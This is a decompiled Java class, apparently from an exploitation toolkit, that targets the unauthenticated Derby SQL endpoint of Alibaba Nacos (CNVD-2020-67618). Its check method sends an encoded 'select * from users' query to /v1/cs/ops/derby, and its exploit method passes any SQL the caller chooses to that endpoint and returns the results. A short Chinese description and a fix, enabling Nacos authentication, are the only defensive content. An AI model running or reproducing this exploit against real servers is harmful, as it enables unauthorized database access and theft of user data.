package com.alibaba.nacos.exploit;

import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import com.alibaba.nacos.httpclient.MyHttpResponse;
import java.net.URLEncoder;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_derby_sql_injection.class */
public class Alibaba_Nacos_derby_sql_injection implements Vulnerability {
    final String VulName = "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)";

    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        getClass();
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n参考链接: %s\n\n", "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", "config server中有个接口，没有做任何的鉴权，即可执行sql语句，可以泄漏全部数据", "与Nacos版本无关,看是否使用了内置的Derby数据库", "对接口接口鉴权, 修改 nacos的application.properties配置文件nacos.core.auth.enabled=true，开启服务身份识别功能", "");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        try {
            MyHttpResponse sendRequest = new MyHttpRequests().sendRequest((str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73", "GET", null, null, true);
            if (sendRequest.getResponseBody().contains("\"code\":200")) {
                getClass();
                return new ExecutionResult(true, "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", null, null);
        }
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        try {
            MyHttpResponse sendRequest = new MyHttpRequests().sendRequest((str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + "/v1/cs/ops/derby?sql=" + URLEncoder.encode(strArr[0], "UTF-8"), "GET", null, null, true);
            if (sendRequest.getResponseBody().contains("\"code\":200")) {
                getClass();
                return new ExecutionResult(true, "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", sendRequest.getResponseBody(), null);
            }
            getClass();
            return new ExecutionResult(false, "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", null, null);
        } catch (Exception e) {
            getClass();
            return new ExecutionResult(false, "Nacos Derby SQL注入漏洞 (CNVD-2020-67618)", null, null);
        }
    }
}
